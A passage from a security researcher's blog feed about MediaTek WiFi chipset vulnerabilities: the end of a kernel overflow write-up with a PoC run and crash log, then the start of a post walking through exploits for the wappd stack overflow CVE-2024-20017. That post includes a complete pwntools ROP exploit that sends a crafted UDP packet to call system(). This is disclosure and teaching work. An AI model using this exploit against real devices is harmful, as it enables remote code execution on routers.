<p>After copying the argument data from userspace into a kernel allocated buffer in <code class="language-plaintext highlighter-rouge">RTMPAPSetInformation()</code>, this data is passed to <code class="language-plaintext highlighter-rouge">FT_KDP_KeyResponseToUs()</code> for processing/handling. Some initial parsing is done on the data and then it is cast to type <code class="language-plaintext highlighter-rouge">FT_KDP_EVT_KEY_ELM</code> and some basic validation is done on some values of the struct. The code continues on to call <code class="language-plaintext highlighter-rouge">FT_R1khEntryInsert()</code> and passes in pointers to multiple members of the key element struct sent by the client, including the <code class="language-plaintext highlighter-rouge">R0KHID</code> and <code class="language-plaintext highlighter-rouge">R0KHIDLen</code> members.</p>

<p>In <code class="language-plaintext highlighter-rouge">FT_R1khEntryInsert()</code>, an allocation is made to hold the data for an object of type <code class="language-plaintext highlighter-rouge">FT_R1HK_ENTRY</code> (148 bytes) and the values passed in as arguments to the function are used to initialize the new object. The vulnerability occurs when the <code class="language-plaintext highlighter-rouge">R0KHID</code> data is copied from the source buffer into a destination buffer using the <code class="language-plaintext highlighter-rouge">R0KHIDLen</code> sent in the attacker-controlled key element struct without checking that it does not exceed the size of the destination (49 bytes). The <code class="language-plaintext highlighter-rouge">R0KHIDLen</code> field of the <code class="language-plaintext highlighter-rouge">FT_KDP_PMK_KEY_INFO</code> is of type <code class="language-plaintext highlighter-rouge">unsigned char</code>, meaning that the maximum value it can hold is 255, so this is the max value that can be chosen by an attacker. This results in the ability to overflow the <code class="language-plaintext highlighter-rouge">FT_KDP_PMK_KEY_INFO.R0khId[49]</code> buffer by ~200 bytes.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1">// @hypr: allocation of vulnerable obj</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">alloc_mem</span><span class="p">(</span><span class="n">p_obj</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">entry</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">FT_R1HK_ENTRY</span><span class="p">))</span> <span class="o">==</span> <span class="n">NDIS_STATUS_FAILURE</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// error case</span>
    <span class="p">}</span>
	<span class="p">...</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">pR0khId</span> <span class="o">!=</span> <span class="nb">NULL</span> <span class="o">&amp;&amp;</span> <span class="n">R0KHIDLen</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">entry</span><span class="o">-&gt;</span><span class="n">R0khIdLen</span> <span class="o">=</span> <span class="n">R0KHIDLen</span><span class="p">;</span>
		<span class="c1">// @hypr: VULNERABLE</span>
        <span class="n">NdisMoveMemory</span><span class="p">(</span><span class="n">entry</span><span class="o">-&gt;</span><span class="n">R0khId</span><span class="p">,</span> <span class="n">pR0khId</span><span class="p">,</span> <span class="n">R0KHIDLen</span><span class="p">);</span>
    <span class="p">}</span>
</code></pre></div></div>

<h4 id="poc-16">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20742.c">PoC Link</a></p>

<p>The attached PoC can be used to trigger the vulnerability and cause a crash like the one shown in the output below the PoC code. It may require more than a single run to corrupt memory enough to cause a crash but this will usually happen within 3 runs. <em>NOTE: multiple runs will require changing the filler byte argument each run, otherwise the request won’t be seen as a new entry and no action will be taken.</em></p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./poc 0x42
</code></pre></div></div>

<p>It will produce output like this upon crashing:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ 8566.183685] Unable to handle kernel paging request at virtual address 42424242424242
[ 8566.191426] pgd = ffffffc014989000
[ 8566.194820] [42424242424242] *pgd=0000000000000000, *pud=0000000000000000
[ 8566.201610] Internal error: Oops: 96000004 [#2] PREEMPT SMP
[ 8566.331494] CPU: 1 PID: 0 Comm: swapper/1 Tainted: P      D         4.4.198 #0
[ 8566.338707] Hardware name: MediaTek MT7622 AX3600-gmac1-WAX206 board (DT)
[ 8566.345486] task: ffffffc0030bee00 task.stack: ffffffc003100000
[ 8566.351402] PC is at __kmalloc+0x110/0x1f0
[ 8566.355489] LR is at __kmalloc+0x4c/0x1f0
[ 8566.359490] pc : [&lt;ffffff8008143208&gt;] lr : [&lt;ffffff8008143144&gt;] pstate: 60000145
[ 8566.366875] sp : ffffffc01ffb7b10
[ 8566.370181] x29: ffffffc01ffb7b10 x28: ffffff800a6d4fd0
[ 8566.375493] x27: ffffff800a671000 x26: 0000000080000100
[ 8566.380805] x25: ffffffc01ffb7d80 x24: 0000000000000005
[ 8566.386117] x23: 0000000000127169 x22: ffffff8000a3adc0
[ 8566.391429] x21: 0000000002080020 x20: 4242424242424242
</code></pre></div></div>

<p>A full LPE exploit using this bug and a couple of others against the WAX206 has been written and will be released along with this post. More details will be given in an upcoming blog post :)</p>

<p><img src="/assets/images/mtk-rk1h-modprobe-exploit.png" alt="rk1h exploit" /></p>

<h2 id="wrapping-up">wrapping up</h2>

<p><img src="/assets/images/stop-hes-dead.jpg" alt="dead" /></p>

<p>That’s it! But more to come soon, including a deep dive into the <strong>full-chain exploit for CVE-2025-20742</strong> and a deep dive into a few bugs <em>not</em> included in this post which impact the WPA EAPOL handlers and which are <strong><em>remotely exploitable</em></strong>! I’m also working on cleaning up some code I wrote earlier this year for a QEMU PCI device to emulate the MT7622 (at least enough to load the driver and interact with the ioctl handlers) which was <em>super</em> useful for debugging and reproducing bugs without the limitations on the test device I had access to. So, stay tuned :)</p>

<h2 id="references">references</h2>

<ul>
  <li><a href="https://github.com/mellow-hype/mediarekt-2025">PoC Code</a></li>
  <li><a href="https://corp.mediatek.com/product-security-bulletin/February-2025">MediaTek Security Bulletin - February 2025</a></li>
  <li><a href="https://corp.mediatek.com/product-security-bulletin/October-2025">MediaTek Security Bulletin - October 2025</a></li>
  <li><a href="https://corp.mediatek.com/product-security-bulletin/November-2025">MediaTek Security Bulletin - November 2025</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="0days" /><category term="mediatek" /><category term="wifi" /><category term="exploits" /><summary type="html"><![CDATA[A year-in-review going over 19+ bugs in Mediatek's MT76xx/MT7915 (and others) wifi chipsets I reported this year, PoCs included!]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/stop-hes-dead.jpg" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/stop-hes-dead.jpg" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">4 exploits, 1 bug: exploiting CVE-2024-20017 4 different ways</title><link href="https://blog.coffinsec.com/0day/2024/08/30/exploiting-CVE-2024-20017-four-different-ways.html" rel="alternate" type="text/html" title="4 exploits, 1 bug: exploiting CVE-2024-20017 4 different ways" /><published>2024-08-30T00:00:00+00:00</published><updated>2024-08-30T00:00:00+00:00</updated><id>https://blog.coffinsec.com/0day/2024/08/30/exploiting-CVE-2024-20017-four-different-ways</id><content type="html" xml:base="https://blog.coffinsec.com/0day/2024/08/30/exploiting-CVE-2024-20017-four-different-ways.html"><![CDATA[<p>This post goes over 4 different exploits for CVE-2024-20017, a remotely exploitable buffer
overflow vulnerability I discovered in a network daemon that’s shipped with the Mediatek MT7622 SDK
and OpenWrt. I use the bug as a sort of case study to explore the different exploit strategies that
could be taken in different situations, starting with the simplest version and moving all the way up
to an exploit for real-world target: the version of this daemon shipped on the Netgear WAX206
wireless router. Strap in, cuz it’s a long one.</p>

<h2 id="introduction">introduction</h2>

<p>Well, here we are. This post was meant to be finished around March of this year to coincide with the
publication of the vulnerability I’m going to be writing about, <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-20017" target="_blank">CVE-2024-20017</a>. Unfortunately, this
also ended up coinciding with me moving, starting a new job, and getting really busy at said job,
so here we are nearly 6 months later. This post is probably going to be one of my longest, so strap
in.</p>

<p>At the end of last year I discovered and reported a vulnerability in <code class="language-plaintext highlighter-rouge">wappd</code>, a network daemon that
is a part of the MediaTek MT7622/MT7915 SDK and RTxxxx SoftAP driver bundle. This chipset is
commonly used on embedded platforms that support Wifi6 (802.11ax) including Ubiquiti, Xiaomi, and
Netgear devices. As is the case for a handful of other bugs I’ve found, I originally came across
this code while looking for bugs on an embedded device: the Netgear WAX206 wireless router. The
<code class="language-plaintext highlighter-rouge">wappd</code> service is primarily used to configure and coordinate the operations of wireless interfaces
and access points using Hotspot 2.0 and related technologies. The structure of the application is a
bit complex but it’s essentially composed of this network service, a set of local services which
interact with the wireless interfaces on the device, and communication channels between the various
components, using Unix domain sockets.</p>

<ul>
  <li>Affected chipsets: MT6890, MT7915, MT7916, MT7981, MT7986, MT7622</li>
  <li>Affected software: SDK version 7.4.0.1 and before (for MT7915) / SDK version 7.6.7.0 and before (for MT7916, MT7981 and MT7986) / OpenWrt 19.07, 21.02</li>
</ul>

<p>The vulnerability is a buffer overflow caused by a copy operation that uses a length value taken
directly from attacker-controlled packet data without bounds checking.  Overall it’s a pretty simple
bug to understand as it’s just a run-of-the-mill stack buffer overflow, so I thought I’d use this
bug as a case study to explore <em>multiple</em> exploit strategies that can be taken using for this one
bug, applying different exploit mitigations and conditions along the way. I think this is
interesting as it provides an opportunity to focus on the more creative parts of exploit
development: once you know there’s a bug, and you understand the constraints, coming up with all of
the different ways you can influence the logic of the application and the effects of the bug to get
code execution and pop a shell.</p>

<p>This post will go over 4 exploits for this bug, starting with the simplest version (no stack
canaries, no ASLR, corrupted return address) all the way up to an exploit written for the <code class="language-plaintext highlighter-rouge">wappd</code>
binary shipped on the Netgear WAX206, where multiple mitigations are enabled and we go from x86-64
to arm64. The code for the exploits can be found <a href="https://github.com/mellow-hype/cve-2024-20017" target="_blank">here</a>; its pretty heavily commented to help make
things clearer. It might help to keep those in sight while reading the post so I’ve included links
to the relevant exploit at the start of each section.</p>

<p><em>NOTE: The first 3 exploits discussed below were written for a version of wappd I compiled myself
on an x86_64 machine and with some slight modifications (different sets of mitigations, disabling
forking behavior, compiler optimization).</em></p>

<h2 id="background">background</h2>

<h3 id="discovery">discovery</h3>

<p>This bug was discovered through fuzzing with a network-based fuzzer named <a href="https://github.com/denandz/fuzzotron" target="_blank">fuzzotron</a> that I was trying
out for the first time. Check out the Github page for more info but tl;dr it can use <code class="language-plaintext highlighter-rouge">radamsa</code> or
<code class="language-plaintext highlighter-rouge">blab</code> for testcase generation and provides a quick way to fuzz network services with minimal
overhead. In the case of this target, I used <code class="language-plaintext highlighter-rouge">radamsa</code> for mutations and generated a starting corpus
manually using Python to define the structure of the expected packet data and write it to disk. I
also made a minor modification to the <code class="language-plaintext highlighter-rouge">wapp</code> daemon code so that it saved a copy of the last packet
it received to disk as soon as it came in to ensure crashing cases could be saved for triage.</p>

<h3 id="root-cause-analysis">root cause analysis</h3>

<p>The vulnerability occurs due to a lack of bounds checking in <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code> prior to using
an attacker-controlled value in a call to <code class="language-plaintext highlighter-rouge">IAPP_MEM_MOVE()</code> (a wrapper around <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code>)
to copy data into a 167-byte stack-allocated structure.</p>

<p>After reading data from either the UDP or TCP socket in <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerUdp()</code> or <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerTcp()</code>,
respectively, the raw data is cast to <code class="language-plaintext highlighter-rouge">struct IappHdr</code> and the <code class="language-plaintext highlighter-rouge">command</code> field is checked; if this
is command <code class="language-plaintext highlighter-rouge">50</code>, the <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code> function will be reached and passed a pointer to the raw
data received from the socket. Inside <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code>, the data is cast to
<code class="language-plaintext highlighter-rouge">struct RT_IAPP_SEND_SECURITY_BLOCK *</code> and assigned to the pointer <code class="language-plaintext highlighter-rouge">pSendSB</code>;  <code class="language-plaintext highlighter-rouge">pSendSB-&gt;Length</code> is
then accessed and used to calculate the length of the data attached to the struct. After copying the
payload data from the cast struct pointer to the <code class="language-plaintext highlighter-rouge">pCmdBuf</code> pointer that is also passed in as an
argument, a call to the macro <code class="language-plaintext highlighter-rouge">IAPP_MEM_MOVE()</code> is made (last line in the snippet below) using the
value of the attacker-controlled <code class="language-plaintext highlighter-rouge">Length</code> field to write from the <code class="language-plaintext highlighter-rouge">pSendSB-&gt;SB</code> buffer field to the
<code class="language-plaintext highlighter-rouge">kdp_info</code> struct declared at the start of the function. Prior to this call, the only bounds check
done on this value is to check that it does not exceed the maximum packet length of 1600 bytes. As
the size of the destination <code class="language-plaintext highlighter-rouge">kdp_info</code> struct is only 167 bytes, this results in a stack buffer
overflow of up to 1433 bytes of attacker-controlled data.</p>

<p>The vulnerable code snippet from <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code> is shown below:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="n">pSendSB</span> <span class="o">=</span> <span class="p">(</span><span class="n">RT_IAPP_SEND_SECURITY_BLOCK</span> <span class="o">*</span><span class="p">)</span> <span class="n">pPktBuf</span><span class="p">;</span>

  <span class="n">BufLen</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">OID_REQ</span><span class="p">);</span>
  <span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">Length</span> <span class="o">=</span> <span class="n">NTOH_S</span><span class="p">(</span><span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">Length</span><span class="p">);</span>
  <span class="n">BufLen</span> <span class="o">+=</span> <span class="n">FT_IP_ADDRESS_SIZE</span> <span class="o">+</span> <span class="n">IAPP_SB_INIT_VEC_SIZE</span> <span class="o">+</span> <span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">Length</span><span class="p">;</span>

  <span class="n">IAPP_CMD_BUF_ALLOCATE</span><span class="p">(</span><span class="n">pCmdBuf</span><span class="p">,</span> <span class="n">pBufMsg</span><span class="p">,</span> <span class="n">BufLen</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">pBufMsg</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
    <span class="k">return</span><span class="p">;</span>
  <span class="cm">/* End of if */</span>

  <span class="cm">/* command to notify that a Key Req is received */</span>
  <span class="n">DBGPRINT</span><span class="p">(</span><span class="n">RT_DEBUG_TRACE</span><span class="p">,</span> <span class="s">"iapp&gt; IAPP_RcvHandlerSSB</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

  <span class="n">OidReq</span> <span class="o">=</span> <span class="p">(</span><span class="n">POID_REQ</span><span class="p">)</span> <span class="n">pBufMsg</span><span class="p">;</span>
  <span class="n">OidReq</span><span class="o">-&gt;</span><span class="n">OID</span> <span class="o">=</span> <span class="p">(</span><span class="n">RT_SET_FT_KEY_REQ</span> <span class="o">|</span> <span class="n">OID_GET_SET_TOGGLE</span><span class="p">);</span>

  <span class="cm">/* peer IP address */</span>
  <span class="n">IAPP_MEM_MOVE</span><span class="p">(</span><span class="n">OidReq</span><span class="o">-&gt;</span><span class="n">Buf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">PeerIP</span><span class="p">,</span> <span class="n">FT_IP_ADDRESS_SIZE</span><span class="p">);</span>

  <span class="cm">/* nonce &amp; security block */</span>
  <span class="n">IAPP_MEM_MOVE</span><span class="p">(</span><span class="n">OidReq</span><span class="o">-&gt;</span><span class="n">Buf</span><span class="o">+</span><span class="n">FT_IP_ADDRESS_SIZE</span><span class="p">,</span>
        <span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">InitVec</span><span class="p">,</span> <span class="n">IAPP_SB_INIT_VEC_SIZE</span><span class="p">);</span>
  <span class="n">IAPP_MEM_MOVE</span><span class="p">(</span><span class="n">OidReq</span><span class="o">-&gt;</span><span class="n">Buf</span><span class="o">+</span><span class="n">FT_IP_ADDRESS_SIZE</span><span class="o">+</span><span class="n">IAPP_SB_INIT_VEC_SIZE</span><span class="p">,</span>
        <span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">SB</span><span class="p">,</span> <span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">Length</span><span class="p">);</span>
  <span class="c1">// BUG: overflow occurs here</span>
  <span class="n">IAPP_MEM_MOVE</span><span class="p">(</span><span class="o">&amp;</span><span class="n">kdp_info</span><span class="p">,</span> <span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">SB</span><span class="p">,</span> <span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">Length</span><span class="p">);</span>
</code></pre></div></div>

<h3 id="code-flow-from-source-to-sink">code flow from source to sink</h3>

<p>The code flow from input to the vulnerable function is:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">IAPP_Start()</code> starts the main processing loop that calls <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code></li>
  <li><code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code> calls <code class="language-plaintext highlighter-rouge">select()</code> to find ready socks and calls the appropriate protocol handler function for each sock that is ready</li>
  <li>Assuming the packet is received over UDP, <code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code> will call <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerUdp()</code>, passing in a pointer <code class="language-plaintext highlighter-rouge">pPktBuf</code> to be used to store the data received</li>
  <li><code class="language-plaintext highlighter-rouge">IAPP_RcvHandler()</code> calls <code class="language-plaintext highlighter-rouge">recvfrom()</code> to read data from the UDP socket and, assuming the data is successfully read, casts the data to <code class="language-plaintext highlighter-rouge">struct IappHdr</code>  and checks the <code class="language-plaintext highlighter-rouge">command</code> field; if the value is <code class="language-plaintext highlighter-rouge">0x50</code>, <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code> is called to handle the request</li>
  <li><code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code> will then use the raw packet data as described above, using the <code class="language-plaintext highlighter-rouge">Length</code> field of the <code class="language-plaintext highlighter-rouge">RT_IAPP_SEND_SECURITY_BLOCK</code> struct embedded in the packet in a call to <code class="language-plaintext highlighter-rouge">IAPP_MEM_MOVE</code> (wrapper for <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code>), which will write from an offset of the packet data to a stack-allocated struct <code class="language-plaintext highlighter-rouge">kdp_info</code>. This is where the overflow occurs.</li>
</ul>

<h3 id="overview-of-the-injection-point">overview of the injection point</h3>

<p>Before going into the details of exploitation lets take a second to review the injection point where
the corruption occurs, the expected payload format, and the constraints that exist.</p>

<p>The max size that will be read from the UDP socket by the application is 1600 bytes, so this is the
max size of the payload we can send. Accounting for the portions of the payload that must be present
to reach the vulnerable code, this gives us about 1430 bytes we can use to corrupt other data. The
definition of the <code class="language-plaintext highlighter-rouge">RT_IAPP_HEADER</code> and <code class="language-plaintext highlighter-rouge">RT_IAPP_SEND_SECURITY_BLOCK</code> structs are shown below. The
former is embedded into the latter and this represents the format that requests are expected to
arrive in; the application will cast the data read from the socket directly to these types.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* IAPP header in the frame body, 6B */</span>
<span class="k">typedef</span> <span class="k">struct</span> <span class="n">PACKED</span> <span class="n">_RT_IAPP_HEADER</span> <span class="p">{</span>
  <span class="n">UCHAR</span> <span class="n">Version</span><span class="p">;</span>  <span class="cm">/* indicates the protocol version of the IAPP */</span>
  <span class="n">UCHAR</span> <span class="n">Command</span><span class="p">;</span>  <span class="cm">/* ADD-notify, MOVE-notify, etc. */</span>
  <span class="n">UINT16</span>  <span class="n">Identifier</span><span class="p">;</span> <span class="cm">/* aids in matching requests and responses */</span>
  <span class="n">UINT16</span>  <span class="n">Length</span><span class="p">;</span>   <span class="cm">/* indicates the length of the entire packet */</span>
<span class="p">}</span> <span class="n">RT_IAPP_HEADER</span><span class="p">;</span>

<span class="k">typedef</span> <span class="k">struct</span> <span class="n">PACKED</span> <span class="n">_RT_IAPP_SEND_SECURITY_BLOCK</span> <span class="p">{</span>
  <span class="n">RT_IAPP_HEADER</span>  <span class="n">IappHeader</span><span class="p">;</span>
  <span class="n">UCHAR</span>     <span class="n">InitVec</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span>
  <span class="n">UINT16</span>      <span class="n">Length</span><span class="p">;</span>
  <span class="n">UCHAR</span>     <span class="n">SB</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="p">}</span> <span class="n">RT_IAPP_SEND_SECURITY_BLOCK</span><span class="p">;</span>
</code></pre></div></div>

<p>The main payload section of the <code class="language-plaintext highlighter-rouge">RT_IAPP_SEND_SECURITY_BLOCK</code> is in the <code class="language-plaintext highlighter-rouge">SB[]</code> field; data is
appended directly to the tail of this struct and the size of this payload is meant to be stored in
the <code class="language-plaintext highlighter-rouge">Length</code> field of the struct. In order to pass other validation checks, the <code class="language-plaintext highlighter-rouge">Length</code> field of
the <code class="language-plaintext highlighter-rouge">IappHeader</code> struct should be kept small; in my payloads I use a size of <code class="language-plaintext highlighter-rouge">0x60</code>. Finally, the
<code class="language-plaintext highlighter-rouge">RT_IAPP_HEADER.Command</code> field must be set to <code class="language-plaintext highlighter-rouge">50</code> in order to reach the vulnerable handler
<code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB</code>.</p>

<p>Other than these basic constraints/requirements, there aren’t any other issues to work around like
avoiding null bytes or other restricted values.</p>

<h2 id="exploit-1-rip-hijack-via-corrupted-return-address-rop-to-system">exploit 1: RIP hijack via corrupted return address, ROP to system()</h2>

<ul>
  <li>Build: non-forking, no optimizations</li>
  <li>Mitigations: NX</li>
</ul>

<p>We’ll first start with the simplest path to achieve code execution, assuming <em>no</em> expoit mitigations
are in place (except non-executable stack). This means addresses are predictable and no leak is
necessary.</p>

<p>This exploit is a classic RIP hijack, using the stack overflow to corrupt the saved return address
and redirect execution. This is about as straightforward as it gets: overflow the stack, align the
overflow to corrupt the saved return address with the desired address to jump to, and wait for the
function to return and use the corrupted value. What you jump to and how you leverage that to get
more control is a blank canvas (for the most part). In the case of this exploit, we keep it simple
by using the corruption to jump to a ROP gadget that will pop a pointer to a string containing a
command to run into the correct registers, and then call <code class="language-plaintext highlighter-rouge">system()</code> to have the command executed.
As ASLR isn’t enabled, we assume knowledge of the address of <code class="language-plaintext highlighter-rouge">system()</code> and a stack address close
to where our payload data will be.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span><span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">context</span><span class="p">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="sh">'</span><span class="s">error</span><span class="sh">'</span>

<span class="n">TARGET_IP</span> <span class="o">=</span> <span class="sh">"</span><span class="s">127.0.0.1</span><span class="sh">"</span>
<span class="n">TARGET_PORT</span> <span class="o">=</span> <span class="mi">3517</span>
<span class="n">PAD_BYTE</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x22</span><span class="sh">"</span>

<span class="c1"># this is addr on the stack close to where our paylaod data is
</span><span class="n">WRITEABLE_STACK</span> <span class="o">=</span> <span class="mh">0x7fffffff0d70</span>

<span class="c1"># Addresses
</span><span class="n">SYSTEM_ADDR</span>     <span class="o">=</span> <span class="mh">0x7ffff7c50d70</span>
<span class="n">EXIT_ADDR</span>       <span class="o">=</span> <span class="mh">0x7ffff7c455f0</span>
<span class="n">TARGET_RBP_ADDR</span> <span class="o">=</span> <span class="mh">0x5555555555555555</span>  <span class="c1"># doesn't matter
</span><span class="n">GADGET_2</span>        <span class="o">=</span> <span class="mh">0x42bf72</span>  <span class="c1"># pop rdi ; pop rbp ; ret
</span>
<span class="c1"># NOTE: tweak `stack_offset` if env changes and exploit isn't finding command string; +/- 0x10-0x40
# should usually do it.
</span><span class="k">def</span> <span class="nf">create</span><span class="p">(</span><span class="n">stack_offset</span><span class="o">=</span><span class="mh">0x1b0</span><span class="p">):</span>
    <span class="c1"># iapp header
</span>    <span class="n">header</span> <span class="o">=</span> <span class="nf">p8</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>      <span class="c1"># version
</span>    <span class="n">header</span> <span class="o">+=</span> <span class="nf">p8</span><span class="p">(</span><span class="mi">50</span><span class="p">)</span>    <span class="c1"># command
</span>    <span class="n">header</span> <span class="o">+=</span> <span class="nf">p16</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>    <span class="c1"># ident
</span>    <span class="n">header</span> <span class="o">+=</span> <span class="nf">p16</span><span class="p">(</span><span class="mh">0x60</span><span class="p">)</span> <span class="c1"># length
</span>
    <span class="c1"># SSB struct frame
</span>    <span class="n">ssb_pkt</span> <span class="o">=</span> <span class="nf">p8</span><span class="p">(</span><span class="mi">55</span><span class="p">)</span> <span class="o">*</span> <span class="mi">8</span>     <span class="c1"># char buf[8], InitVec
</span>    <span class="n">ssb_pkt</span> <span class="o">+=</span> <span class="nf">p16</span><span class="p">(</span><span class="mh">0x150</span><span class="p">,</span> <span class="n">endian</span><span class="o">=</span><span class="sh">'</span><span class="s">big</span><span class="sh">'</span><span class="p">)</span>  <span class="c1"># u16 Length
</span>
    <span class="c1"># Main payload
</span>    <span class="n">final_pkt</span> <span class="o">=</span> <span class="n">header</span> <span class="o">+</span> <span class="n">ssb_pkt</span>
    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="n">PAD_BYTE</span> <span class="o">*</span> <span class="mi">176</span>
    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">WRITEABLE_STACK</span><span class="p">)</span>
    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="n">PAD_BYTE</span> <span class="o">*</span> <span class="mi">16</span>
    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">WRITEABLE_STACK</span><span class="p">)</span>

    <span class="c1"># RBP OVERWRITE
</span>    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">TARGET_RBP_ADDR</span><span class="p">)</span>

    <span class="c1"># Core Exploit
</span>    <span class="c1"># this will be the first place execution will be redirected; will load the next value into $rdi
</span>    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">GADGET_2</span><span class="p">)</span>
    <span class="c1"># pointer to the command string defined a few lines down
</span>    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">WRITEABLE_STACK</span> <span class="o">-</span> <span class="n">stack_offset</span><span class="p">)</span>
    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="n">PAD_BYTE</span> <span class="o">*</span> <span class="mi">8</span>
    <span class="c1"># address to system to jump to for code exec
</span>    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">SYSTEM_ADDR</span><span class="p">)</span>

    <span class="c1"># address to exit() cleanly upon return
</span>    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="nf">p64</span><span class="p">(</span><span class="n">EXIT_ADDR</span><span class="p">)</span>
    <span class="c1"># command to run through system()
</span>    <span class="n">final_pkt</span> <span class="o">+=</span> <span class="sa">b</span><span class="sh">"</span><span class="s">echo LETSGO!!!</span><span class="se">\x00</span><span class="sh">"</span>
    <span class="k">return</span> <span class="n">final_pkt</span>

<span class="c1"># send payload bytes to target
</span><span class="n">final_pkt</span> <span class="o">=</span> <span class="nf">create</span><span class="p">()</span>
<span class="n">conn</span> <span class="o">=</span> <span class="nf">remote</span><span class="p">(</span><span class="n">TARGET_IP</span><span class="p">,</span> <span class="n">TARGET_PORT</span><span class="p">,</span> <span class="n">typ</span><span class="o">=</span><span class="sh">'</span><span class="s">udp</span><span class="sh">'</span><span class="p">)</span>
<span class="n">conn</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="n">final_pkt</span><span class="p">)</span>

<span class="n">context</span><span class="p">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="sh">'</span><span class="s">info</span><span class="sh">'</span>
<span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">sent payload to target </span><span class="si">{</span><span class="n">TARGET_IP</span><span class="si">}</span><span class="s">:</span><span class="si">{</span><span class="n">TARGET_PORT</span><span class="si">}</span><span class="s"> (</span><span class="si">{</span><span class="nf">len</span><span class="p">(</span><span class="n">final_pkt</span><span class="p">)</span><span class="si">}</span><span class="s"> bytes)</span><span class="sh">"</span><span class="p">)</span>
</code></pre></div></div>

<p>On a successful run, the output of the iappd daemon will show a failed call to bash and then print
out the string “LETSGO!!!”, demonstrating the successful execution of <code class="language-plaintext highlighter-rouge">echo</code>, and then exits
cleanly.</p>

<p>(Un)fortunately, these days you’re almost guaranteed to find stack cookies and ASLR in use on
embedded platforms, which will prevent such trivial exploitation. In those cases, you’ll need an
info leak to (hopefully) leak the cookie value or you’ll just have to move onto other techniques
that don’t rely on corrupting the saved return address.</p>

<hr />

<h2 id="exploit-2-arbitrary-write-via-pointer-corruption-got-overwrite">exploit 2: arbitrary write via pointer corruption, GOT overwrite</h2>

<ul>
  <li>Build: x86_64, non-forking, no optimizations</li>
  <li>Mitigations: ASLR, stack canaries, NX, partial RELRO</li>
  <li><a href="https://github.com/mellow-hype/cve-2024-20017/blob/main/x86_64/x86_64_partial_relro_got.py" target="_blank">Exploit code</a></li>
</ul>

<p>Continuing from where the previous section left off, let’s say at least stack canaries and ASLR are
enabled and the exploit above is no longer viable. Since we don’t have an info leak, let’s shift the
focus from corrupting the saved return address on the stack and consider what else could be achieved
